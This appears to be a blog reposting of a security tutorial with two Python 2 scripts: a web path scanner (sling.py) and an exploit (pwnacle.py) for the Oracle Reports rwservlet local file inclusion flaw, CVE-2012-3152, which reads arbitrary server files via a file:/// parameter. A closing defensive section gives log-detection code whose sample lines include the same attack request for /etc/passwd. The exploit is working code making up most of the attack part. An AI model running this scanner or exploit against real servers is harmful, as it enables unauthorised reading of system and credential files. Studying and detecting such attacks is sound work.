[primalsecurity] 0x7 – Web Scanning and Exploitation
0w0, 2019. 12. 24. 15:53
- Scanning a target for resources
- Exploiting an LFI (Local File Inclusion) vulnerability in an Oracle product
sling.py

```python
#####################################
# sling.py - checks for resources   #
# Can search for string in response #
#####################################
from bs4 import BeautifulSoup
import sys, optparse, socket
from urllib import urlopen  # Python 2 urllib: urlopen does not raise on HTTP 404, so getcode() can be inspected

class Colors:
    RED = '\033[91m'
    GREEN = '\033[92m'

def webreq(server, resources): # Function takes in URL, and resources variable which contains the requests
    resource = []
    for item in open(resources, 'r'): # Loop through the resource file
        resource.append(item.strip()) # Append each item in the file to the array
    socket.setdefaulttimeout(5) # Timeout for the connections urlopen makes (the original set it on an unused socket, so it never applied)
    for item in resource: # Loop through the array and create a request for each item in the array
        url = server.strip()+item.strip() # Format the url variable to store the request: "http://www.site.com/CFIDE/administrator/enter.cfm"
        try:
            request = urlopen(url) # Make the request
            if search: # If the "search" variable is true (-s)
                parsed = BeautifulSoup(request.read(), "lxml") # Parse the output with BeautifulSoup
                if search in str(parsed): # If the search string is in the output print the next line
                    print Colors.GREEN+"[+] URL: "+url+" ["+str(request.getcode())+"] Found: '"+search+"' in output"
            elif request.getcode() == 404: # If we got an HTTP 404 status code
                print Colors.RED+"[+] URL: "+url+" ["+str(request.getcode())+"]" # Print the URL and status code
            elif request.getcode():
                print Colors.GREEN+"[+] URL: "+url+" ["+str(request.getcode())+"]"
        except Exception: # Timeout or connection error: skip this resource instead of aborting the whole server
            continue

def main():
    # Creates CLI switches and stores in variables
    parser = optparse.OptionParser(sys.argv[0]+' '+
                                   '-i <file_with URLs> -r -s [optional]')
    parser.add_option('-i', dest='servers', type='string', help='specify target file with URLs')
    parser.add_option('-r', dest='resources', type='string', help='specify a file with resources to request')
    parser.add_option('-s', dest='search', type='string', help='[optional] Specify a search string -s ')
    (options, args) = parser.parse_args()
    servers = options.servers
    resources = options.resources
    global search; search = options.search
    if (servers is None) or (resources is None): # Both -i and -r are required; print usage if either is missing
        print parser.usage
        sys.exit(0)
    for server in open(servers, 'r'): # loop through each URL in the file
        webreq(server, resources) # Invoke the webreq function

if __name__ == "__main__":
    main()
```
Web Scanning

```
$ python sling.py -h
Usage: sling.py -i <file_with URLs> -r -s [optional]
Options:
  -h, --help    show this help message and exit
  -i SERVERS    specify target file with URLs, i.e. the target URL list
  -r RESOURCES  specify a file with resources to request, i.e. the resources to request
  -s SEARCH     [optional] Specify a search string -s, the search option
```

That is:
The target URL list must contain one URL per line, e.g. 'http://www.google.com/'.
The resources to request (what gets scanned) must also be one per line:
CFIDE/
admin/
tmp/
Running the command without the -s option

```
$ python sling.py -i URLs -r reqs
```
Giving an arbitrary output condition with the -s option

By passing the string google with the -s option, the script prints only the results of requests whose response contains that string.
pwnacle.py

```python
#######################################
# pwnacle.py - Exploits CVE-2012-3152 #
# Oracle Local File Inclusion (LFI)   #
#######################################
import urllib, sys, ssl, inspect
# Python 2 only: rebuild ssl.wrap_socket so it negotiates SSLv3 instead of SSLv23 (old Oracle Reports servers)
exec inspect.getsource(ssl.wrap_socket).replace("PROTOCOL_SSLv23","PROTOCOL_SSLv3") in dict(inspect.getmembers(ssl.wrap_socket))["func_globals"]
import socket

server = sys.argv[1] # Assigns first argument given at the CLI to 'server' variable
dir = sys.argv[2] # Assigns second argument given at the CLI to 'dir' variable
ip = server.split('/')[2] # formats the server by splitting the string based on the '/' which grabs the IP out of 'http://ip/'
req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///' # request format to exploit the vulnerability
print "Sending Request: "+server+req+dir+'"'
if 'http://' in server: # Use urllib module for http -- self signed SSL certs caused an exception with urllib
    try:
        conn = urllib.urlopen(server+req+dir+'"') # Send the request to the server
        out = conn.readlines()
        for item in out: # Iterate over the lines read above (iterating conn again would yield nothing)
            print item.strip()
    except Exception as e:
        print e
if 'https://' in server: # Create web request with ssl module
    try:
        conn = ssl.wrap_socket(socket.create_connection((ip, 443)))
        # HTTP headers are terminated with CRLF; a blank line ends the request
        request = 'GET '+req+dir+'"'+' HTTP/1.1'+'\r\n'
        request += 'Host: '+ip+'\r\n'
        request += 'User-Agent: Mozilla/5.0 '+'\r\n'
        request += 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'+'\r\n'
        request += 'Accept-Language: en-US,en;q=0.5'+'\r\n'
        request += 'Accept-Encoding: gzip, deflate'+'\r\n'
        request += 'Connection: keep-alive'+'\r\n'
        conn.send(request+'\r\n')
        print conn.recv()
        print conn.recv(20098)
    except Exception as e:
        print e
```
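From the defender's side, both scripts leave a recognisable footprint in the web server's access log: sling.py produces a burst of 404s for paths such as CFIDE/, admin/ and tmp/ from one client, and pwnacle.py sends a rwservlet request with JOBTYPE=rwurl and a file:/// URLPARAMETER. The following detector is an added example, not code from the tutorial; the log lines are constructed in Common Log Format and the 404 threshold is an assumed value.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not taken from the page or a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2019:15:53:01 +0900] "GET /CFIDE/ HTTP/1.1" 404 162
203.0.113.5 - - [24/Dec/2019:15:53:01 +0900] "GET /admin/ HTTP/1.1" 404 162
203.0.113.5 - - [24/Dec/2019:15:53:02 +0900] "GET /tmp/ HTTP/1.1" 404 162
203.0.113.5 - - [24/Dec/2019:15:53:02 +0900] "GET /cgi-bin/ HTTP/1.1" 404 162
198.51.100.7 - - [24/Dec/2019:15:54:10 +0900] "GET /index.html HTTP/1.1" 200 5120
198.51.100.7 - - [24/Dec/2019:15:55:00 +0900] "GET /reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22file:///etc/passwd%22 HTTP/1.1" 200 1783
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# The request shape pwnacle.py sends: rwservlet with JOBTYPE=rwurl and a file:/// URLPARAMETER
LFI_RE = re.compile(r'rwservlet\?.*JOBTYPE=rwurl.*URLPARAMETER="?file:///', re.IGNORECASE)

def parse_log(text):
    """Return (ip, method, decoded path, status) for every line that matches CLF."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rows.append((m["ip"], m["method"], unquote(m["path"]), int(m["status"])))
    return rows

def find_lfi_attempts(rows):
    """Return (ip, path) for requests matching the Oracle Reports rwservlet LFI pattern."""
    return [(ip, path) for ip, _, path, _ in rows if LFI_RE.search(path)]

def find_enumeration(rows, threshold=3):
    """Return clients with at least `threshold` 404s for distinct paths (sling.py-style probing)."""
    misses = defaultdict(set)
    for ip, _, path, status in rows:
        if status == 404:
            misses[ip].add(path)
    return {ip: sorted(paths) for ip, paths in misses.items() if len(paths) >= threshold}

if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    for ip, path in find_lfi_attempts(rows):
        print(f"[LFI] {ip} {path}")
    for ip, paths in find_enumeration(rows).items():
        print(f"[ENUM] {ip} 404s for {len(paths)} paths: {paths}")
```

The path is URL-decoded before matching so the encoded quotes (%22) in the sample line do not hide the file:/// parameter from the regex.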